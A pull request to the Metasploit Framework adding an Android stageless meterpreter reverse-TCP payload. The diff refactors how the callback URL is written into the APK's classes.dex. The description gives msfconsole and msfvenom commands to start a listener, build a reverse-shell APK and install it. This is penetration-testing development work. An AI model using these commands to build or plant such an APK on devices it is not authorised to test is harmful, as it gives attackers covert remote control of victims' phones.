### PR TITLE
add android stageless meterpreter_reverse_tcp

### DIFF
--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -41,8 +41,7 @@ module MetasploitModule
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
-    apply_options(classes)
+    apply_options(classes, opts, url)
 
     jar = Rex::Zip::Jar.new
     jar.add_file("classes.dex", fix_dex_header(classes))
@@ -58,5 +57,6 @@ module MetasploitModule
 
     jar
   end
+
 
 end

--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -41,7 +41,6 @@ module MetasploitModule
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
 
     verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                          datastore['HandlerSSLCert'])
@@ -50,7 +49,7 @@ module MetasploitModule
         string_sub(classes, 'WWWW                                        ', hash)
     end
 
-    apply_options(classes)
+    apply_options(classes, opts, url)
 
     jar = Rex::Zip::Jar.new
     jar.add_file("classes.dex", fix_dex_header(classes))


### PR DESCRIPTION
This pr adds the android/meterpreter_reverse_tcp.rb
I'll add android/meterpreter_reverse_http asap (I'm currently having issues with multiple sessions being reported).
## Verification
- [ ] Start a handler: 

```
./msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter_reverse_tcp; set lhost 0.0.0.0; set lport 4444; set ExitOnSession false; run -j"
```
- [ ] Create a stageless apk, install and run it:

```
./msfvenom -p android/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o met.apk
./tools/exploit/install_msf_apk.sh met.apk
```
- [ ] **Verify** You can get a working session
- [ ] **Verify** You do not see 'sending stage' on new sessions
